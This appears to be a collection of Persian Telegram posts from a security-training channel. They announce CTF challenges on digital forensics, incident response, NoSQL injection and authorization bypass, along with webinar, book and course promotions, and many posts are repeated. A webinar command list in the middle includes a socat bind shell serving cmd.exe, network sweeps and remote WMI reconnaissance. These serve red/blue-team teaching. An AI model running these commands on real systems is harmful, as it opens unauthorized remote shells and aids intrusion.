✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود.
✅ لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر نماییم.
💡 به پاس قدردانی از تمام دوستان گرامی هم اکنون کد تخفیف 60 درصدی بر روی کلیه محصولات وب سایت دنیای امنیت قابل دسترس می باشد.
🔸 به منظور استفاده از تخفیف مذکور می توانید به سایت دنیای امنیت مراجعه نموده و عبارت 100challenge را در بخش کد تخفیف وارد نمایید.
🔰 در انتها مجدد از همراهی شما دوستان گرامی کمال تشکر را داریم.
🔴 منتظر خبرهای بعدی ما در خصوص پلتفرم Challenginno باشید.
🌐 https://shop.securityworld.ir
✅ امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود.
✅ لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر نماییم.
💡 به پاس قدردانی از تمام دوستان گرامی هم اکنون کد تخفیف 60 درصدی بر روی کلیه محصولات وب سایت دنیای امنیت قابل دسترس می باشد.
🔸 به منظور استفاده از تخفیف مذکور می توانید به سایت دنیای امنیت مراجعه نموده و عبارت 100challenge را در بخش کد تخفیف وارد نمایید.
🔰 در انتها مجدد از همراهی شما دوستان گرامی کمال تشکر را داریم.
🔴 منتظر خبرهای بعدی ما در خصوص پلتفرم Challenginno باشید.
🌐 https://shop.securityworld.ir
✔️ در بررسی هایی که بر روی یک سیستم در شبکه انجام شده، مشخص گردیده که یک فایل بر روی آن سیستم اجرا شده است. این فایل در فرآیند تحقیقات، شناسایی و استخراج شده است.
✅ شما باید ابتدا نحوه اجرا شدن و قرار گیری این فایل را شناسایی نموده و اجرای آن را اثبات نمایید. در ادامه باید با بررسی فایل اجرایی موجود، پروسسی که توسط این فایل فراخوانی و حذف شده است را نیز شناسایی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/registry-analysis
✅ شما باید ابتدا نحوه اجرا شدن و قرار گیری این فایل را شناسایی نموده و اجرای آن را اثبات نمایید. در ادامه باید با بررسی فایل اجرایی موجود، پروسسی که توسط این فایل فراخوانی و حذف شده است را نیز شناسایی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/registry-analysis
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چهارمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-4
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چهارمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-4
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.
✅ هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-5
✅ تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.
✅ هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-5
challenginno.ir
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی ✅ امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود. ✅ لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر…
✔️ سلام و عرض ادب خدمت کلیه دوستان گرامی
✅ تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.
🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.
🔰 ممنون از لطف و همراهی همه دوستان گرامی
🌐 https://shop.securityworld.ir
✅ تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.
🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.
🔰 ممنون از لطف و همراهی همه دوستان گرامی
🌐 https://shop.securityworld.ir
✔️ رایت آپ مربوط به چالش سرویس های آسیب پذیر - شماره سه هم اکنون در سایت قرار داده شد.
✅ تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
✅ تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
✔️ در این چالش، شما با مجموعهای از ترافیک شبکه مواجه هستید که شامل چند مرحله است.
✅ دادههای موجود در فایل PCAP نشاندهنده یک جریان ارتباطی هستند که شامل تبادل دادهها و یک فایل پیوست است.
✅ وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/data-flow-analysis
✅ دادههای موجود در فایل PCAP نشاندهنده یک جریان ارتباطی هستند که شامل تبادل دادهها و یک فایل پیوست است.
✅ وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/data-flow-analysis
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✔️ یک تحلیلگر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش دادهاند که فعالیتهای غیرعادی مشاهده کردهاند، اما هیچ برنامهای به طور واضح در حال اجرا نیست.
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
Forwarded from securityworld
PowerShell for Pentest-Final.pdf
2.7 MB
✅ پاورشل به عنوان یک ابزار قدرتمند در سیستمعامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده میشود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
🌐 همچنین که به زودی چالش های مرتبط با این کتاب در وب سایت challenginno.ir قرار داده خواهد شد.
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time
`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
✔️ آسیبپذیری SQL Injection یکی از رایجترین و خطرناکترین نقاط ضعف امنیتی در برنامههای تحت وب است. این آسیب پذیری زمانی رخ میدهد که ورودیهای کاربر بهدرستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئریهای SQL استفاده شوند.
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✍🏻دوره Splunk Engineering
⏰مدت زمان: 36 ساعت
🧑🏻💻مدرس : احمدرضا نوروزی
📚سرفصل ها :
Deploying Splunk
Splunk Installation
Secure Splunk Enterprise
Manage Users & Roles
Monitoring Splunk
Licensing Splunk
Configuration File & Directory Structure
Manage Indexes
Manage Cluster Master & Indexers
Create Indexes.Conf
Manage Deployment Server
Configuring Basic Forwarding
Configuring Search Head Cluster & Deployer
Configuring Heavy Forwarder Cluster
Splunk Multisite Structure
📝ثبت نام از طریق :
🆔@soorin_sec
☎️09102144597
تیم سورین
⏰مدت زمان: 36 ساعت
🧑🏻💻مدرس : احمدرضا نوروزی
📚سرفصل ها :
Deploying Splunk
Splunk Installation
Secure Splunk Enterprise
Manage Users & Roles
Monitoring Splunk
Licensing Splunk
Configuration File & Directory Structure
Manage Indexes
Manage Cluster Master & Indexers
Create Indexes.Conf
Manage Deployment Server
Configuring Basic Forwarding
Configuring Search Head Cluster & Deployer
Configuring Heavy Forwarder Cluster
Splunk Multisite Structure
📝ثبت نام از طریق :
🆔@soorin_sec
☎️09102144597
تیم سورین
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✔️ یک شرکت امنیتی متوجه میشود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایلهای حساس را از سیستم خود پاک کرده است.
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✔️ قسمت Authorization Testing یکی از بخشهای کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزمهای تعیین سطوح دسترسی و Authorization در برنامههای وب میپردازد.
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema